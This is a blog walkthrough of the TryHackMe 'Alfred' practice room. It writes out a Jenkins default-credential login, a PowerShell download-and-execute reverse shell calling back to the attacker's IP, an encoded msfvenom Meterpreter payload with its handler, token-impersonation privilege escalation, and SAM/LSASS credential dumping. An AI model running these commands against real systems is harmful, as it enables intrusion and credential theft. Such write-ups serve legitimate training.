TL;DR Walkthrough of the TryHackMe Alfred room.
THM Walkthroughs:
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
CISM is thankfully done and we are back on TryHackMe and studying for a hands on exam. The hands on cert is Windows heavy, so we are brushing up. This is just a standard practice room on TryHackMe, but it was good practice with command injection, reverse shells, msfvenom payloads, and Meterpreter. It also used Jenkins, which I hadn’t seen since CRTP, so that was interesting.
— — Task 1 — -
How many ports are open? (TCP only)
sudo nmap -Pn -sV -O 10.10.175.71
3
What is the username and password for the login panel? (in the format username:password)
The Jenkins default is admin:password, but THM’s answer box lets us know both the username and password are five characters each based on the asterisks. Hence I tried admin\admin and got lucky.
admin:admin
Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it: powershell iex (New-Object Net.WebClient).DownloadString(‘http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
You first need to download the Powershell script and make it available for the server to download. You can do this by creating an http server with python: python3 -m http.server
No answer needed
What is the user.txt flag?
I had used Invoke-PowerShellTcp.ps1 before in the CRTP course and exam, but I believe this is the first time I’d seen it suggested on TryHackMe. If you don’t already have it loaded on your Kali it’s available here.
Once you have downloaded and unzipped the PS1s just change to the directory and host it via Python’s simple HTTP server.
cd /home/kali/Downloads/exploits/nishang-master/Shells
python3 -m http.server 8080
Open a new tab in the terminal and start a simple netcat listener.
netcat 4444 -lvp
My Kali IP is 10.8.201.25, obviously do an ‘ifconfig’ and check yours. TryHackMe helpfully provides the command syntax. There’s a RCE feature in the build options on the Jenkins portal. We can abuse this to send ourselves a shell as the user who’s running Jenkins.
powershell iex (New-Object Net.WebClient).DownloadString(‘http://10.8.201.25:8080/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.8.201.25 -Port 4444
Hit ‘Build Now’ in Jenkins and as long as you input everything correctly you will see the tab running the Python HTTP server show a file download and shortly afterwards you will have shell access in the tab running netcat.
whoami /groups
Get-Content C:\Users\bruce\Desktop\user.txt
We get the user flag.
79007a09481963edf2e1321abd9ae2a0
Leave those tabs open!
THM’s VM was rather janky. Normally at this point I’d enable WinRM, create a new local admin with a known password, and evil-winrm into the thing. However this particular VM didn’t want to work with WinRM or RDP. Maybe THM was trying to force us to follow their steps, or maybe the VM is just running on the proverbial hope and a prayer. Who knows.
— — Task 2 — -
We can get a better shell by hosting a msfvenom payload via the simple HTTP server we are already running and then running it from that initial reverse shell. One just has to open two more terminal tabs in Kali; one to generate the payload and one to run Metasploit and catch the shell.
I simply put the msfvenom payload in the directory that I was already hosting.
cd /home/kali/Downloads/exploits/nishang-master/Shells
msfvenom -p windows/meterpreter/reverse_tcp -a x86 - encoder x86/shikata_ga_nai LHOST=10.8.201.25 LPORT=5555 -f exe -o MyReverseShell.exe
What is the final size of the exe payload that you generated?
73802 bytes
— — Task 3 — -
View all the privileges using whoami /priv
No answer needed
You can see that two privileges(SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let’s use the incognito module that will allow us to exploit this vulnerability.
Enter: load incognito to load the incognito module in Metasploit. Please note that you may need to use the use incognito command if the previous command doesn’t work. Also, ensure that your Metasploit is up to date.
No answer needed
To check which tokens are available, enter the list_tokens -g. We can see that the BUILTIN\Administrators token is available.
Use the impersonate_token “BUILTIN\Administrators” command to impersonate the Administrators’ token. What is the output when you run the getuid command?
I will run through how to do all of Task 3 in the last question regarding the root flag. The answer here though is simply:
NT AUTHORITY\SYSTEM
Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions — it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).
Ensure that you migrate to a process with correct permissions (the above question’s answer). The safest process to pick is the services.exe process. First, use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS
No answer needed
Read the root.txt file located at C:\Windows\System32\config
Remember back in Task 1 when I said “don’t close that shell yet!”. This is why, simply use that shell to grab and execute the msfvenom payload we created in Task 2.
Open a new tab in Kali and start a Metasploit listener.
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 5555
set LHOST 10.8.201.25
run
Then in the shell on THM’s VM run the payload.
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.8.201.25:8080/MyReverseShell.exe','MyReverseShell.exe')"
Start-Process ".\MyReverseShell.exe"
Nice, we get a Meterpreter session. Let’s run as system, list processes, migrate to the services.exe PID, and read the root flag. TryHackMe helpfully let us know where it was located.
getsystem
ps
migrate 668
cat C:/Windows/System32/config/root.txt
dff0f748678f280250f25a45b8046b4a
On a side note though, let’s pretend that THM didn’t tell us where the root.txt file was located. We can search the entire system with:
search -f root.txt
Or if we at least know it’s in C:\Windows\System32:
search -d C:\\Windows\\System32 -f root.txt
Lastly, it’s rarely a bad habit to dump creds from any system you get into.
run post/windows/gather/hashdump
An alternate method is to use Meterpreters builtin kiwi. It can dump the SAM, LSASS, etc.
load kiwi
lsa_dump_sam
Summary
That’s it for this room. Even if it wasn’t anything new, it was still good practice.
References
PowerShell reverse shells: https://www.hackingarticles.in/powershell-for-pentester-windows-reverse-shell/
Find files using Meterpreter: https://www.offsec.com/metasploit-unleashed/searching-content/
Hashdump in Meterpreter: https://www.offsec.com/metasploit-unleashed/windows-post-gather-modules/